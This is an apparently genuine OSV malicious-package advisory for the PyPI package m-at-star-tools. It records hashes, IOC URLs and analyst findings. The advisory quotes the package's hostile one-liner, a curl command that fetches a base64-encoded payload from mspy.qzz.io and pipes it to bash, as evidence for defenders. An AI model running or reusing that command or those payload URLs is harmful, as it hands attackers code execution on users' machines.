{"id":"MAL-2026-4812","summary":"Malicious code in m-at-star-tools (PyPI)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (2934ab77e0615ccddf2cf336b023659bafca2fe94bbf2f78e4c0d2a2ba1d7bf2)\nThe package's sole console_script `m0scan` (m0scan/main.py:6-7) executes `curl -sL https://mspy.qzz.io/M0scan | base64 -d | bash`, fetching an opaque base64-encoded shell payload from a dynamic-DNS-style host (`mspy.qzz.io`) unrelated to any publisher infrastructure and piping it directly to bash. The fetch is unpinned, unverified (no hash, no signature), obfuscated (base64), and points at a mutable URL — whoever controls `mspy.qzz.io/M0scan` controls arbitrary code execution on every user who runs the tool. Package metadata is throwaway: author `M-AT-STAR`, generic GitHub homepage, 5-byte README, no email or license. The package self-describes as an 'M0scan installation wrapper' — the wrapper IS the dropper. Any invocation of the documented CLI yields full attacker code execution on the installer's machine.\n\n## Source: kam193 (1c1aca876bca2f4006ca7cad627f7eb20efcd63e7d9706852e1740d4c0d66dc1)\nThe package downloads remote encoded code, which then downloads the next encrypted stage. The encryption of final data requires knowing a code.\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2026-05-m-at-star-tools\n\n\nReasons (based on the campaign):\n\n\n - Downloads and executes a remote malicious script.\n\n\n - obfuscation\n","modified":"2026-06-15T03:00:55.074895301Z","published":"2026-05-26T10:43:03Z","database_specific":{"malicious-packages-origins":[{"import_time":"2026-05-26T13:32:46.10000306Z","sha256":"2934ab77e0615ccddf2cf336b023659bafca2fe94bbf2f78e4c0d2a2ba1d7bf2","modified_time":"2026-05-26T10:43:03Z","id":"IN-MAL-2026-004898","source":"amazon-inspector","versions":["1.0.4"]},{"import_time":"2026-05-26T22:55:24.733407763Z","sha256":"1c1aca876bca2f4006ca7cad627f7eb20efcd63e7d9706852e1740d4c0d66dc1","modified_time":"2026-05-26T22:36:40.683327Z","id":"pypi/2026-05-m-at-star-tools/m-at-star-tools","source":"kam193","versions":["1.0.0","1.0.3","1.0.4"]}],"iocs":{"urls":["https://raw.githubusercontent.com/M-AT-STAR/run/main/tspynstll_m0.nstll","https://mspy.qzz.io/M0scan","https://raw.githubusercontent.com/M-AT-STAR/run/main/c_stp_m0.enc","https://raw.githubusercontent.com/M-AT-STAR/run/main/M0scan.tspy"]}},"references":[{"type":"PACKAGE","url":"https://pypi.org/project/M-AT-STAR-Tools/1.0.4/"},{"type":"WEB","url":"https://bad-packages.kam193.eu/pypi/package/m-at-star-tools"}],"affected":[{"package":{"name":"m-at-star-tools","ecosystem":"PyPI","purl":"pkg:pypi/m-at-star-tools"},"versions":["1.0.4","1.0.0","1.0.3"],"database_specific":{"indicators":{"package_integrity":[{"hashes":{"sha256":"e4b1029b090a2f5e83098519a58b83a77ced0f228fe77a93fec928dfffa4ce3e","md5":"e596ae1287baa87c7dc4950483ef0a26","blake2b_256":"2fdf8f9f96a1efcf3d000faf15d4a554556f77cd7c030e1a0cf7e01f029fc16a"},"filename":"m_at_star_tools-1.0.4-py3-none-any.whl"},{"hashes":{"sha256":"3d5426e74f8d1b6d608a481bad70b562336b77aba121dcac289d5690befba25a","md5":"b95a8631d1acdeac368fb954f65ce8b1","blake2b_256":"9a83a24d3a23eb0e22d2f620588a780e7dce3003d5e7cc896e5251b9d7254c73"},"filename":"m_at_star_tools-1.0.4.tar.gz"}],"evidence_files":[{"sha256":"ca9746b26f972a7f8aa2b0a1823d9478ce1ca35f65f7fc41bebb125768716f11","tlsh":"ecd097db05592060594183c40208a6d082382e1f1b90322ab3247aaa1f224ba42d08a2","path":"m0scan/main.py"},{"tlsh":"ced022207330e0363ec30b8d40793ab0f6f912106ac1202bc4e2dee1c30aa0823d2130","sha256":"78f01d2cb0943fab9d5a8d05bed9fcb2caaf90b6259899e9512bb536abf04367","path":"PKG-INFO"}]},"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/m-at-star-tools/MAL-2026-4812.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"},{"name":"Kamil Mańkowski (kam193)","contact":["https://github.com/kam193","https://bad-packages.kam193.eu/"],"type":"REPORTER"}]}